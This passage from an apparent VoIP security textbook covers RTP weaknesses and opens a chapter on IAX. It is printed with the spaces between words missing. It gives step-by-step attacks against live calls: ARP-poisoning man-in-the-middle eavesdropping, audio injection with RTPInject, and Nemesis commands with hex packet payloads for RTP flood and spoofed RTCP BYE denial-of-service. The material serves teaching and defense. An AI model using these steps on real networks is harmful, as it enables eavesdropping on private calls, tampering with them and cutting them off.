time,theissueshaveonlyrecentlycometothesurface,assecuritytools,suchasWiresharkandCain&Abel,havemadetheattackprocessquiteeasy.
Note✎
Onemightarguethatotherprotocols,includingHTTP,FTP,telnet,TFTP,POP3,andSMTP,alsotransmitincleartextwithlittlesecurityprotections;however,mostphoneusersassumeacertainlevelofprivacy,integrity,andreliabilitywiththeirconversations.Usersofmanysystem-levelprotocolsdonotalwaysmaketheseassumptions.
ThischapterdiscussesRTPsecurityasitpertainstoVoIP,includingspecificvulnerabilitieslikeeavesdropping,voiceinjection,andDenialofService.
RTPBasicsRTPisaUDPprotocolthatcanbeuseddynamicallyonports1024to65535.AlthoughRTPcanbeusedonanyUDPportgreaterthan1024,manyVoIPenterprisesolutions,suchasthoseofferedbyCiscoandAvaya,canbeconfiguredtousestaticportsforRTPpackets.Inaddition,majorsoftphonestendtousespecificrangesforRTP/RTCPconnectionsratherthanrandomlypickportsacrossconnections.ThebasicelementsofanRTPpacketarenodifferentfromthoseassociatedwithanyotherprotocol.RTPpacketsincludeasequencenumber,timestamp,payload(data),SRRC(synchronizationsource),andCSRC(contributingsource),asshowninthefollowinglist.SequencenumberThisisthevaluethatmaintainsstatebetweenVoIPendpoints.ThesequencenumberincreasesbyoneforeachRTPpacketsentbyoneendpoint.TimestampThetimestampholdsthetimeinformationfortheRTPconnection.Itshouldbenotedthatthetimestampisanindicationofthesamplingperiodoftheaudiopayloadinthe
packet,whichistypicallyincrementedby160ineachpacket.SynchronizationsourceThisisthesourceforpacketsynchronizationduringanRTPstream.ContributingsourceThisisacontributiontothesynchronizationsourceduringanRTPstream.
Note✎
TolearnmoreabouttheRTPprotocolandhowitworks,refertotheRFClocatedathttp://www.faqs.org/rfcs/rfc1889.html/.
SectionBoftheRTPRFC,"SecurityConsiderations,"liststhemanysecurityconcernsassociatedwiththeprotocol.Forexample,itdescribeshowusersmayassumemoreprivacyfromvoice(phone)communicationthanfromdata(e.g.,email)transmission,becauseofwhattheyexpectfromphoneconversationoverwiredtelephonelines.ThefirstsentenceinSection9oftheRFCalsostatesthatsecurityisexpectedtobeaddressedatlowerlevels,suchasIPSec.However,mostVoIPimplementationswillnotuseIPSecatlowerlevelstoprotectcallprivacy.Furthermore,theuseoflower-levelencryptionprotocolsmaydrasticallyreducetheperformanceofVoIPcommunication,causingtheaudioqualitytodegrade.Thesefacts,aswellasmanyotherswrittenintheRFC,hintatthesecurityissuesassociatedwiththeRTPprotocol.
RTPSecurityAttacksSecurityattacksonVoIPareusuallyfocusedoncapturingmedia(audio),whichinvolvesRTP.Thelackofencryptionand/orprivacyallowsseveraltypesofattacksfromunauthorizedusers,includinganonymous,unauthenticatedusers.
Note✎
WhileSecureRTP(SRTP),describedinChapter9,doesprovidesecurityformediacommunication,mostenterpriseorganizationshavenotimplementedSRTPbecauseofperformanceand/oroperationalissues.
RTPisvulnerabletomanytypesofattacks,includingtraditionalones,suchasspoofing,hijacking,DenialofService,andtrafficmanipulation,aswellasnewerones,suchaseavesdroppingandvoiceinjection.Inthefollowingsections,we'llfocusonthemostdangerousandsevereattacksonRTP,including:
PassiveeavesdroppingActiveeavesdroppingDenialofService
PassiveEavesdropping
RTP'scleartextpacketscanbesniffedoverthenetworkjustaswithtelnet,FTP,andHTTP.However,unlikesuchanattackontelnet,simplycapturingafewRTPpacketsoverthenetworkwillnotprovideanattackerwithallthesensitiveinformationheorshewants.ThisisbecauseRTPtransfersstreamsofaudiopackets,meaningthatanattackermustcaptureanentirestreaminordertocaptureaconversation.CapturingjustasingleRTPpacketwouldbelikecapturingtheletterSfromthis
sentence—you'dhaveonlyasingleletterandnoneoftherealinformation.WhilethismakesRTPeavesdroppingabittougherthaninterceptingsimplertraffic,theabilitytocaptureRTPaudiostreamsisstillverypossible.ToolslikeCain&AbelandWiresharkmakecapturingRTPstreamsoverthenetworkalmosteasy.ThesetoolscaptureasequenceofRTPpackets,reassembletheminthecorrectorder,andsavetheRTPstreamasanaudiofile(e.g.,.wav)usingthecorrectaudiocodec.Thisallowsanypassiveattackertosimplypoint,click,andeavesdroponalmostanyVoIPcommunicationwithinhisorherownsubnet.
CapturingPacketsfromDifferentEndpoints:Man-in-the-Middle
Aman-in-the-middleattackinvolvesanuntrustedthirdpartyinterceptingcommunicationbetweentwotrustedendpoints,asshowninFigure4-2.Forexample,let'ssaytwotrustedparties,SoniaandKusum,communicateviaatelephone.InordertocommunicatewithKusum,Soniadialsherphonenumber.WhenKusumanswersthephone,Soniabeginsthecommunicationprocesswithher.Duringaman-in-the-middleattack,anattackerinterceptstheconnectionbetweenSoniaandKusumandhasbothendpointscommunicatethroughhimorher.Inthisway,theattackereffectivelyactsastherouterbetweenSoniaandKusum.BothKusumandSoniacontinuetocommunicate,blissfullyunawareoftheattackersittinginthemiddleoftheircall,listeningin.Theattackislikeathree-wayphonecall,withtwoofthethreecallersunawareofthethirdone.Thegoalofaman-in-the-middleattackistosniffonaswitch,becauseswitchesdirecttraffictotheintendeddestinationportonly.Conversely,sniffingonahubispossiblebydefaultbecauseitallowsallportstoseeallcommunication,therebymakingitquiteeasytosniffaneighbor'straffic.ManyswitchesareLayer2devices,meaningthattheycan
transmitpacketsfromoneportonaswitchtoanothernode'smachineaddress(MAC)insteadofanIPaddress(typeipconfig/allonaWindowscommandlinetoseetheMACaddressnotedbyphysicaladdress).TheMACaddressisusedbythemanufactureroftheNICtoidentifyituniquely.Layer2routingiscommonforperformancereasons,allowingswitchestotransferpacketsquicklyacrossthenetwork.Thekeytoaman-in-the-middleattackistoupdatetheswitch,router,oroperatingsystem'sARPcache(Layer2routingtable)andtellitthataspecificIPaddressisnowassociatedwithanewMACaddress(thatoftheattacker).WhenasystemtriestocontactthelegitimateIPaddressviaitsLayer2MACaddress,itwillberoutedtotheattacker'smachinebecausethesystem'sARPtablewasmaliciouslyupdatedbytheattacker.
Figure4-2.Man-in-the-middleattack
InordertocompletethisattackasshowninFigure4-2,anattackerwouldsendanARPreplypackettothetwoVoIPphonesonthenetwork,tellingtheVoIPphonesthattheIPaddressof172.16.1.1isnow00-AO-CC-69-89-74,whichhappenstobetheLayer2MACaddressoftheattacker'smachine.OncetheARPpacketsarereceivedbythephones,thephoneswillautomaticallyupdatetheirownARPtable,denoting172.16.1.1as00-AO-CC-69-89-74.OnceeitherVoIPphonetriestocontacttheswitchattheIPaddressof172.16.1.1,itwillactuallyberedirectedtotheattacker's
machine.Inorderfortheman-in-the-middleattacktoworkasintended,theattackermustroutethatpackettothecorrectdevice,allowingbothpartiestocommunicatenormallywithoutknowingthatathirdpartyismonitoringthecommunication.Formoreinformationonman-in-the-middleattacks,refertohttp://www.grc.com/nat/arp.htm/.
UsingCain&AbelforMan-in-the-MiddleAttacks
OurexamplewilluseCain&Abel(writtenbyMassimilianoMontoro)tocaptureRTPpackets,reassemblethem,anddecodethemto.wavfiles.We'llstartbyusingCain&Abeltoperformaman-in-the-middleattackontheentirenetworksubnetandthenuseitsRTPsniffertocaptureallRTPpacketsandlistentothecapturedaudio.Herearethestep-by-stepinstructions:
1. DownloadandinstallCain&Abelfromhttp://www.oxid.it/cain.html/,usingthedefaults.
2. InstalltheWinPCappacketdriverifyoudon'talreadyhaveoneinstalled.
3. Reboot.4. LaunchCain&Abel.5. Selectthegreeniconintheupperleft-handcornerthat
lookslikeanetworkinterfacecard,asshowninFigure4-3.6. EnsurethatyourNIChasbeenidentifiedandenabled
correctlybyCain&Abel,thenselecttheSniffertab.7. Clickthe+symbolinthetoolbar.8. TheMACAddressScannerwindowwillappearand
enumeratealltheMACaddressesonthelocalsubnet.ClickOK.(Figure4-3showstheresults.)
Figure4-3.MACAddressScannerresults
9. SelecttheAPRtabatthebottomofthetooltoswitchtotheARPPollutionRoutingtab.
10. Clickthe+symbolonthetoolbartoshowalltheIPaddressesandtheirMACsasshowninFigure4-4.
Figure4-4.IPaddressesandtheirMACs
11. FromtheARPPoisonRoutingmenu,choosethetargetforyourman-in-the-middleattackfromthelistofIPaddresses
andtheircorrespondingMACaddressesasshownontheleftinFigure4-5.Themostlikelytargetwillbethedefaultgatewayinyoursubnetsothatallpacketswillgothroughyoufirstbeforetheyreachtherealgatewayofthesubnet.
12. Onceyouselectyourtarget,whichis172.16.1.1inourexample,selecttheVoIPendpoints(ontherightsideofthescreen)fromwhichyouwanttointercepttraffic.YoucanchoosealltheVoIPendpointsinthesubnetoraparticularone.We'llchoose172.16.1.119,asshowninFigure4-5.ClickOKonceyou'vemadeyourselections.
Figure4-5.Man-in-the-middletargets
13. Whenyou'vereturnedtothemainscreen,clicktheyellow-and-blackicon(secondfromtheleft)tostarttheman-in-the-middleattack.ThiswillallowtheuntrustedthirdpartytostartsendingARPresponsesonthenetworksubnet,telling172.16.1.119thattheMACaddressof172.16.1.1hasbeenupdatedto00-00-86-59-C8-94,asshowninFigure4-6.
Figure4-6.Man-in-the-middleattackinprocesswithARPpoisoning
14. Atthispoint,alltrafficfromendpointAtoendpointBisgoingthroughtheuntrustedthirdpartyfirstandthenonitsappropriateroute.TheuntrustedthirdpartycannowuseCain&Abel,Wireshark,orasimilarprogramtocapturetheRTPpacketsandreassemblethemintoacommonaudioformat.
15. SelecttheSniffertabatthetopoftheprogram.16. SelectVoIPfromthetabsatthebottom,asshownin
Figure4-7.IfVoIPcommunicationhasoccurredonthenetworkusingRTPmediastreams,Cain&AbelwillautomaticallysavetheRTPpackets,reassemblethem,andsavethemto.wavformat.AsshowninFigure4-7,Cain&Abelhascapturedafewphoneconversationsoverthenetwork.
UsingWireshark
TouseWiresharktoreassembleRTPpacketsandsavethemtoa.wavfile,continuefromstep14abovefortheman-in-the-middleattack,andthencompletethefollowingsteps:
1. DownloadandinstallWiresharkfromhttp://www.wireshark.org/,usingthedefaults.
2. InstalltheWinPCappacketdriverifyoudon'talreadyhaveoneinstalled.
Figure4-7.CapturedVoIPcommunicationviaRTPpackets
3. Reboot.4. StartWireshark,thenselectCapture►Interfacesfromthe
menubar.5. SelectOptionsfromtheinterfaceyouwanttosniff.6. IntheDisplayOptionssection,selectUpdatelistofpacketsin
realtime,Automaticscrollinginlivecapture,andHidecaptureinfodialog.
7. ClickStart.8. OnceWiresharkstartssniffingpackets,enterRTPinthe
FiltertextboxandclickApply.9. Once15or20RTPpacketsappear,stopthesniffer(Capture
►Stop).10. HighlightoneoftheRTPpackets.
11. SelectStatistics►RTP►StreamAnalysis,asshowninFigure4-8.
Figure4-8.WiresharkStreamAnalysisofcapturedRTPpackets
12. Atthispoint,youwillbeshownmoredetailsoftheRTPpacketsthathavebeensniffedoverthenetwork.Simplyselecttheconversation(row)youwishtolistentoandthenclickSavepayload.
13. WhentheSavePayloadAswindowappears,youaregiventheoptiontosavetheRTPstreamtoanaudiofile(assumingthecodecusedfortheaudiofileissupported).Selectthe.auradioboxastheformatinwhichyouwishtosavethefile,typethenameofthefile,andthenclickOK.(SeeFigure4-9.)
Figure4-9.SavingRTPpacketstoanaudiofile
14. Openandlistentothesavedaudiofile.
ActiveEavesdropping
Inadditiontopassiveeavesdroppingattacks,RTPisalsovulnerabletoactiveattacks.Thefollowingattacksdescribewhenanattackercansniffonthenetwork,usingsomethinglikeWireshark,andthenexecuteactiveattacks,suchasvoiceinjection,againstVoIPendpointssupportingRTP.InjectionattacksallowmaliciousentitiestoinjectaudiointoexistingVoIPtelephonecalls.Forexample,anattackercouldinjectanaudiofilethatsays"Sellat118"betweentwostockbrokersdiscussinginsidertradinginformation.ThereareafewwaystoinjectvoicecommunicationbetweentwoVoIPendpoints.We'lldiscusstwomethods,whichareaudioinsertionandaudioreplacement.Bothmethodsinvolvemanipulationofthetimestamp,sessioninformation,andSSRCofanRTPpacket.
AudioInsertion
ThesessioninformationbetweentwoVoIPendpointsis
controlledbya32-bitsignalingsource(SSRC)aswellasthe16-bitsequencenumberandtimestampnumber.TheSSRCnumberisarandomnumberthatensuresanytwoendpointswillusedifferentidentifierswithinthesameRTP.Althoughthelikelihoodofcollisionislow,theSSRCnumberensurestheuniquenessoftheidentifier.However,becausethesessioninformationissentincleartext,attackerscanviewitoverthenetwork.Also,becausemostvendorVoIPproductsdonottrulyrandomizeanyofthevalues,theabilitytoinjectRTPpacketsfromaspoofedsourceispossible.Thesequentialinformationallowsattackerstopredictthevaluesforeachstate-controllingentity,whichopensthedoorforinjectionattacks.
Note✎
InjectiontechniqueswereintroducedinatoolcalledHunt(availablefromhttp://packetstormsecurity.org/sniffers/hunt/hunt-1.5bin.tgz/),whichwouldinjectsessioninformationtohijacktelnetconnections.
RTPsessionsarealsovulnerabletoinjectionattacksbecausethepacketsdonotuserandominformationforsessionmanagement,inadditiontotheproblemthattheinformationissentincleartext.Forexample,foragivenRTPsession,thetimestampusuallystartswith0andincrementsbythelengthofthecodeccontent(e.g.,160ms);thesequencestartswith0andincrementsby1;andtheSSRCisusuallyastaticvalueforthesessionandafunctionoftime.Allthreeofthesevaluesareeitherpredictableinnatureand/orstatic.Anattackerwhoisabletosniffthenetworkcancreatepacketswiththecorrecttimestamp,sequence,andSSRCinformation,ensuringthatthepacketincreasesappropriatelyasspecifiedbythecurrentsession(usuallybyone).Oncetheattackerhaspredictedthecorrectinformation,heorshewillbeabletoinjectpackets(audio)intoanexistingVoIPconversation.Theabilitytogatherthecorrectinformationfor
thetimestamp,sequence,andSSRCcanbequiteeasybecausealloftheinformationtraversesthenetworkincleartext.Anattackercansimplysniffthenetwork,readtherequiredinformationfortheattack,andinjectnewaudiopackets.Furthermore,becausetheinformationisnotrandom,atoolcanbewrittentoautomatetheprocessandthusrequirelittleeffortonthepartoftheattacker.Figure4-10showsanexampleoftheRTPinjectionprocess.Noticethattheattacker'sSSRCnumberisthesameasthatofitstarget,butitssequencenumberandtimestampareinsyncwiththelegitimatesession,makingtheendpointassumethattheattacker'spacketsarepartoftherealsession.
Figure4-10.RTPinjection
CompletethefollowingstepstoinjectanaudiofileintoanexistingVoIPconversation.
1. DownloadRTPInject(writtenbyZaneLackeyandAlexGarbutt)fromhttp://www.isecpartners.com/tools.html/.
2. FollowtheReadme.txtfileforusageofaWindowsmachine.FortheLinuxversion,RTPInjectdependsonthefollowingpackages,whicharepre-installedonmostmodernLinuxsystems,suchasUbuntu,RedHat,andBackTrackLiveCD(mustberunwithrootprivileges):
Python2.4orhigherGTK2.8orhigherPyGTK2.8orhigher
3. InstallthepypcaplibraryincludedwithRTPInjectbyusingthefollowingcommands:
bash#tarzxvfpypcap-1.1.tar.gzbash#cdpypcap-1.1bash#makeallbash#makeinstall(*note:thisstepmustbeperformedasroot)
4. InstallthedpktlibraryincludedwithRTPInjectbyusingthefollowingcommands:
bash#tarzxvfdpkt-1.6.tar.gzbash#cddpkt-1.6bash#makeinstall
5. Performaman-in-the-middleattackonthenetwork(ifnecessary)usingdsniff(Linux)orCain&Abel(Windows),asdescribedearlierinthischapter,inordertocaptureallRTPstreamsinthelocalsubnet.
6. LaunchRTPInjectusingthefollowingcommands:bash#pythonrtpinject.py
7. OnceRTPInjectisloaded,itwillshowthreefieldsinitsprimaryscreen,includingtheSourcefield,theDestinationfield,andtheVoiceCodecfield.SeeFigure4-11forthedetailsoftheinjection.TheSourcefieldwillbeauto-populatedasRTPInjectdetectsRTPstreamsonthenetwork.WhenanewIPaddressappearsintheSourcefield,clicktheIPaddress,whichwillshowthedestinationVoIPphoneandvoicecodecbeingusedinthestream.
Figure4-11.RTPInjectmainwindow
8. RTPInjectthenautomaticallytranscodestheprovided.wavfileintothecorrectcodec(becauseRTPInjectdisplaysthevoicecodecinuse,theusercouldalsocreatetheaudiofilewiththepropercodecheorshewishestoinject).UsingWindowsSoundRecorderorSoxforLinux,createanaudiofileinthefileformatshownbyRTPInject,suchasA-Law,u-Law,GSM,G.723,PCM,PCMA,and/orPCMU.a. OpenWindowsSoundRecorder(Start►Programs►
Accessories►Entertainment►SoundRecorder).b. ClicktheRecordbutton,recordtheaudiofile,andthen
clicktheStopbutton.c. SelectFile►SaveAs.d. ClickChange.UnderFormat,selectthecodecthatwas
displayedinRTPInject.SeeFigure4-12.BothWindowsSoundRecorderandLinuxSoxaudioutilitiesprovidetheabilitytotranscodeaudiotomostofthecommoncodecsused.
Figure4-12.WindowsSoundRecodercodec
e. ClickOKandthenSave.9. Oncethisaudiofilehasbeencreated,clickthefolder
buttononRTPInjectandnavigatetothelocationofthefilerecordedinStep6.SeeFigure4-13.
Figure4-13.Selectdialog
10. WiththeRTPstreamandaudiofileselected,clicktheInjectbutton.RTPInjectinjectstheselectedaudiofiletothedestinationhostintheRTPstream.SeeFigure4-14.
Figure4-14.InjectionaudiowithRTPInject
AudioReplacement
Asmentionedpreviously,thesessioninformationbetweentwoVoIPendpointsiscontrolledbytheSSRC,sequencenumber,andtimestampnumber.Unliketheaudioinsertionattack,theaudioreplacementattackdoesnotinjectaudioduringanexistingphoneconversationbutreplacestheexistingaudioduringacall.Forexample,iftwotrustedendpointsareholdingaphoneconversation,anattackercanreplacethelegitimateaudioinformationwiththeattacker'sowninformation.Insteadofhearingthecommunicationfromeithersource,theendpointswouldbelisteningtowhattheattackerchooses.Audioreplacementwouldbehighlydamagingincaseswheremanyendpointsarelisteningtoasinglesource,suchascompanyconferencecalls.Inordertoreplacetheexistingaudiostream,theattackerneedstosendRTPpacketswithahighersequencenumberandtimestamp,butusingthesameSSRCinformation.ThetargetwillthenseeRTPpacketswithasingleSSRCnumber,onefromthelegitimateendpointandonefromtheattacker.However,whentheendpointseesthattheattacker'spackethasahigher
whentheendpointseesthattheattacker'spackethasahighertimestampandsequencenumber,itwillassumethattheattacker'spacketsarethemostcurrentandthuscontinueonwithitsinformation.Thehighersequencenumberandtimestampontheattacker'spacketsmakesthelegitimateendpoint'spacketinformationlookoldandoutdated.Oldandoutdatedpacketinformationwouldbediscardedbythetargetinfavorofthemostrecentinformationonthenetwork,whichinthiscasehasbeenprovidedbytheattacker.Thistechniqueallowstheattacker'spackettolookcurrentwhiletheendpoint'spacketslookoldandinvalid.Asaresult,thetargetreceivesthepacketinformationfromtheattackerandplaystherogueaudioinformation,whichcanbewhatevertheattackerwishestoplay.Forthisattacktooccur,theattacker'ssequenceinformationandsessionIDinformationmustalwaysbehigherthanthatoftherealendpoint.Figure4-15showsanexampleoftheRTPreplacementprocess.Noticethattheattacker'sSSRCnumberisthesameasitstarget,butitssequencenumberandtimestamparemuchhigherthaninthelegitimatesession.Thisforcesthereceivingendpointtoassumethatthelegitimatephone'spacketsareold.
Figure4-15.RTPinjectionaudioreplacement
DenialofService
TherearemanywaystocarryoutaDenialofServiceattackonaVoIPinfrastructure,includingtargetingtheRTPprotocol.DenialofServiceattacksarealoteasiertocarryoutonsessionsetupprotocols,suchasattacksonH.323andSIP,butcanalsobeperformedonRTP.UnlikeH.323andSIP,whenaDoSattackoccursontheRTPprotocolitself,theimpactishigherastheRTPprotocolcontrolstheaudioportionofacall.ThissectiondiscussesthefollowingtypesofRTPDoSattacks(thereareseveralmoreRTPDoSattacks,butthissectionwilldiscussonlythetopthree):
MessagefloodingRTCPBYE(sessionteardown)SSRCinjection
MessageFlooding
TheeasiestwaytocarryoutaDoSattackduringanRTPsessionistofloodoneendofanexistingVoIPcallwithanenormousamountofRTPpackets.Becauseauthenticationisassumedtohavebeenprovidedbyotherprotocols,suchasH.323orSIP,RTPendpointsareforcedtorevieweachpacketsenttothem(assumingtheyareallpacketsofanexistingcall).Duringacall,twoentitiessendRTPpacketstoeachother,containingtheaudioinformationforthecall.TheRTPpacketsidentifytheuniquecallbasedontheSSRCnumber.EverytimeanRTPpacketisreceivedbyanendpointwiththesameSSRCvalue,acertainamountoftimeisrequiredfortheendpointtoreviewthepacketanddeterminewhethertoacceptordropit,evenifthatpacketturnsouttobeboguswithincorrectinformation.Repeatedoverandoverseveralthousandtimesasecond,thispacketreviewcanbecostly.ThelegitimateRTP
second,thispacketreviewcanbecostly.ThelegitimateRTPpacketsmustcompetefortheendpoint'stimeorwaitinlineforreview,causingtheexistingRTPcommunicationstreamtoslowdownorsimplystop.AslowdownorstoppageintheRTPstreamwilldisruptthecall,leadingtoaDenialofServiceattack.CompletethefollowingstepstoexecuteaDoSattackonRTPcommunication.
1. UsingNemesisorSnifferPro,createanRTPpacketandsendittoanendpointthathasanexistingVoIPcallwithRTPpackets.We'lluseNemesis,whichcanbefoundathttp://www.packetfactory.net/projects/nemesis/,fromtheBackTrackLiveCD.
2. StartNemesisfromtheBackTrackLiveCD.3. SniffthenetworkandfindanexistingVoIPcallusingRTP.
NotethesourceIP,destinationIP,andportsbeingusedwithRTP.
4. DownloadiSEC.RTP.Flood.DOSfromhttp://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/We'llusethisastheinputfilewithNemesisinordertoexecutetheRTPDoSattack.
5. Withahexeditor,edittheSSRCinformationtomatchtheoneyouhavesniffedoverthenetwork.Theauthor'sSSRCnumberis909524487(step8),butthisvalueshouldbechangedtomatchthevalueofthecallyouwishtoterminate.
6. Oncethefileisdownloaded,executethenemesiscommandinstepbusingthepreviouslabinformation:a. NetworkInformation
i. Attacker'sIP:172.16.1.103ii. Attacker'sMAC:00:05:4E:4A:E0:E1iii. Target'sIP:172.16.1.140
iv. Target'sMAC:02:34:4F:3B:A0:D3v. ExistingRTPport(thismustbesniffedbythe
attacker):42550b. ExampleSyntax:
nemesisudp-x42550-y42550-S172.16.1.103-D172.16.1.140-H00:05:4E:4A:E0:E1-M02:34:4F:3B:A0:D3-PiSEC.RTP.Flood.DOS
7. IssuethecommandrepeatedlyforaslongasyouwanttheDoSattacktooccur(itmightbebettertocreateascripttorepeatthisindefinitely).
8. ThefollowinghexinformationistheexamplepacketwithRTPfloodinformation.BesuretouseahexeditorifyouwishtomodifythisfileforusewithNemesis:
800018232f1d8e8d36363e07e9ead4d0ec5c517bcdd55defdbf372e6d97e6c756257edd2e74c445ce25b4ad5c577e8c7c0d8545efc55454f473b3530487c63cdc0cacab2bbb6b475dae53c36373e3e354af66a74e2c3bdb8bbbfc4d7dae64b456aef4e46506dc1d0d0bfcad76b766b3e3f4b4b635deac5483fa4b42fbab6354fb93b2b38e3ad5548b25e3bcbb24e3dc0bac73240bc4847c0f33462bed8e2553d45d8b3c7373dc7c24c5fdd5c
Done!YouarenowfloodingaVoIPendpointwithanRTPcommunicationstreamwithbogusRTPpackets.Overtime,theexistingcallshouldbesloweddownorsimplydropped(dependingonhowlongyousendtheabovepacket).
RTCPBye(SessionTeardown)
ThenextDenialofServiceattackwewilldiscussusesspoofedinformation.DuringanRTPconnection,RTCPcanbeuseforsynchronization,QualityofServicemanagement,andseveralothersessionsetup,maintenance,andteardownresponsibilities.Aswiththemessagefloodingissue,RTPassumesthatauthenticationhastakenplacewithother
protocols;hence,anypacketsenttoitisconsideredforreview.Asaconsequence,anattackerwhocansniffthenetworkcanspoofanRTCPBYEpacketandforcetheendpointtoterminatethecall.AnRTCPBYEmessagesimplyindicatesthatoneoftheendpointsisnolongeractiveorthattheRTPsessionshouldnotbeusedanylonger.BYEmessagescanoccurforavarietyofreasons,rangingfromduplicateSSRCmessagestoadisappearingendpoint.IfaBYEmessageisreceivedbyanendpoint,thatendpointassumesthattheotherendpointithasbeencommunicatingwithcannolongerreceiveorsendRTPcommunication;thus,thesessionisclosed.InorderfortheBYEmessagetobespoofedbyanattackerandusedtoendacall,theattackerneedstoknowthecorrectsource,destination,port,andSSRCinformationbetweenthetwopartiestoanexistingVoIPcall.CompletethefollowingstepstoexecuteaDoSattackusingRTCPBYEmessages.
1. UsingNemesisorSnifferPro,createanRTPpacketandsendittoanendpointthathasanexistingVoIPcallwithRTPpackets.We'lluseNemesisinthisexample.
2. StartNemesisfromtheBackTrackLiveCD(http://nemesis.sourceforge.net/).
3. SniffthenetworkforanexistingVoIPcallusingRTP.NotethesourceIP,destinationIP,ports,andSSRCinformationbeingusedwiththecall.
4. DownloadiSEC.RTCP.BYE.DOSfromhttp://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/tobeusedastheinputfilewithNemesisinordertoexecutetheRTCPDOS.
5. Withahexeditor,edittheSSRCinformationtomatchtheoneyouhavesniffedoverthenetwork.Theauthor'sSSRCnumberis909524487(asinstep8).Changethisvaluetomatchthevalueofthecallyouwishtoterminate.
6. Oncethefileisdownloadedandhasbeenupdated,executethenemesiscommandinstepbwiththepreviouslabinformationinstepa:a. NetworkInformation
i. Attacker'sIP:172.16.1.103ii. Attacker'sMAC:00:05:4E:4A:E0:E1iii. Target'sIP:172.16.1.140iv. Target'sMAC:02:34:4F:3B:A0:D3v. ExistingRTPport(thismustbesniffedbythe
attacker):42550b. ExampleSyntax:
nemesisudp-x42550-y42550-S172.16.1.103-D172.16.1.140-H00:05:4E:4A:E0:E1-M02:34:4F:3B:A0:D3-PiSEC.RTCP.BYE.DOS
ThefollowinghexinformationistheexamplepacketwithRTCPBYEinformation:
81cb000c36363e07
Done!YouhavesentanRTCPBYEmessagetoaVoIPendpointwithanexistingRTPcommunicationstream.Oncetheendpointprocessesthepacket,thecallshouldbesloweddownandthendropped.
SummaryRTPisthemostpopularcommunicationprotocolforVoIPnetworks.WhetheritisusedwithSIPorH.323,itisresponsiblefortheaudiocommunicationonceacallhasbeensetup.WhileSIPandH.323havetheirownsecurityissues,theuseofRTPintroducesmanymore.RTPassumesthatasignificantamountofsecurityiscomingfromelsewhereduringaVoIPcall,allowingittobeabsentofmanybasicsecurityprotectionswithauthentication,authorization,andencryption.TheprimaryitemsusedtocontrolRTPpacketsbetweenanytwoentitiesarethesessioninformation,timestamp,andSSRCinformation.Alloftheseitemsareeasilyspoofablebyattackersorunauthorizedinternalusers,allowingmaliciouspersonneltoperformseveraltypesofattacksdirectlyonRTP,includingeavesdropping,voiceinjection,andDenialofService.Eavesdropping,voiceinjection,andDenialofServiceattacksarebasicallytheworst-casescenarioforanyvoiceconversation,forthefollowingreasons:
TheabilityofattackerstolistentophonecallsbetweentwotrustedentitiesremovesanyguaranteeofconfidentialityonaVoIPcall.TheabilityofanattackertoinjectaudioduringexistingconversationseliminatestheintegrityofaVoIPcall.TheabilityofattackerstoendacallforciblyeliminatesthereliabilityoftheVoIPcall.
Withoutconfidentiality,integrity,andreliability,RTPsessionsareleftsorelylackinginsecurity.WhenbuildingaVoIPnetworkusingRTP,itisimportanttoknowaboutthemajorproblemswithauthentication,authorization,andencryptionthatstemfromitsnatureas
cleartextcommunication.ThischapterhasfocusedontheflawswithRTPsothatusersmayunderstandtherisk.Chapter9willdiscussdefenses,includingpossibledefensestoRTP,suchasSecureRTP.
Chapter5.SIGNALINGANDMEDIA:IAXSECURITY
Inter-AsteriskeXchange(IAX[2])isaprotocolusedforVoiceoverIP(VoIP)communicationwithAsteriskservers(http://www.asterisk.org/),anopensourcePBXsystem.AlongwithAsteriskservers,IAXcanbeusedbetweenanyclientendpoint[3]andserversystemsupportingtheIAXprotocolforvoicecommunication.IAXismuchsimplerthanotherVoIPprotocolssuchasH.323.Forinstance,IAXusesasingleUDPport(port4569)betweenallendpointsandservers.ThisfeaturemakesIAXveryattractiveforfirewalladministrators,whoareoftenaskedtoopenmanyportshigherthan1024forVoIPcommunication.Additionally,IAXprovidesforbothsignalingandmediatransferwithintheprotocolitself,whileotherVoIPimplementationsuseseparateprotocols,likeH.323orSIPforsignalingandRTPformediatransfer.Theuseofmultipleports/protocolsinVoIPoftenmakesthenetworkmoreconfusingthanfiguringoutwheretheLineofControlsitsbetweenIndiaandPakistan.Regardingsecurity,thedraftRFCtellsusthatIAXusesabinaryprotocolandclaimstoofferahigherdegreeofprotectionagainstbufferoverrunattacks[4]thanASCIIprotocolssuchasSIP.IAXalsooffersRSApublic-keyauthenticationandcallconfidentialitythroughAES.However,despitetheimportanceofthesesecurityfeatures,theyarefrequentlyabsentinIAXdeployments.ThisleavesmanyIAXimplementationsasvulnerableasunprotectedSIPorH.323systems.BecauseIAXstillsupportscleartextcommunication,unencryptedvoiceconversationscanbesniffed,recorded,andreplayedbyeavesdroppers.ThecommonlyusedMD5challenge/responseauthenticationmechanismspecifiedbyIAX
alsoallowspassiveandactiveadversariestolaunchseveralkindsofattacks.Theseattacksincludeofflinedictionaryattacksoncredentialsandpre-computeddictionaryattacks.Additionally,MD5authenticationisoftenvulnerabletoman-in-the-middleattacksandpotentiallytodowngradeattacks(dependingupontheimplementation).Finally,severalDenialofServiceattacksarepossible,addingtotheavailabilityconcernsofIAX(i.e.,servicesbeingupandrunning).Similartoanyunauthenticatednonprivateprotocol,manydatedsecurityattackscanbecarriedout,regardlessofwhetherthecommunicationisusingIAX,SIP,H.323,RTP,SCCP,oranyotherVoIPprotocol.ThischapterwillfocusonIAX,buttheattackclassescanbeassumedforanyprotocolwithsimilarstructure.FormoreinformationontheIAXarchitecture,seehttp://tools.ietf.org/html/draft-guy-iax-04/.TheRFCiscurrentlyindraft,sotherewillbemanyrevisionstoitbeforefinalapproval.ThesecurityaspectssupportedbyIAXimplementationswillbetheprimaryfocusofthischapter,specificallyauthentication,passwordprotection,andavailability.
IAXAuthenticationIAXsupportsthreeauthenticationmethods:MD5authentication,plaintextauthentication,andRSAauthentication.RSAauthenticationisnotwidelydeployed;however,itisthestrongestsecurityoption.Theattacksurface(theexposureanyentityhastoanattack)forRSAauthenticationisnotonlysmall,butitsuseofpublicandprivatekeysgreatlystrengthenstheauthenticationmodelagainstpassiveandactivenetworkattacks.Conversely,plaintextauthenticationisbyfartheworstmethodtobeusedwithIAX.Plaintextauthenticationpassestheusernameandpasswordintheclear,makingthenetworkvulnerabletonumerousattacksandpassiveeavesdroppers.ThemostwidelyusedauthenticationmethodisMD5.IntheMD5authenticationprocess,IAXendpointsuseachallenge/responsesystembased
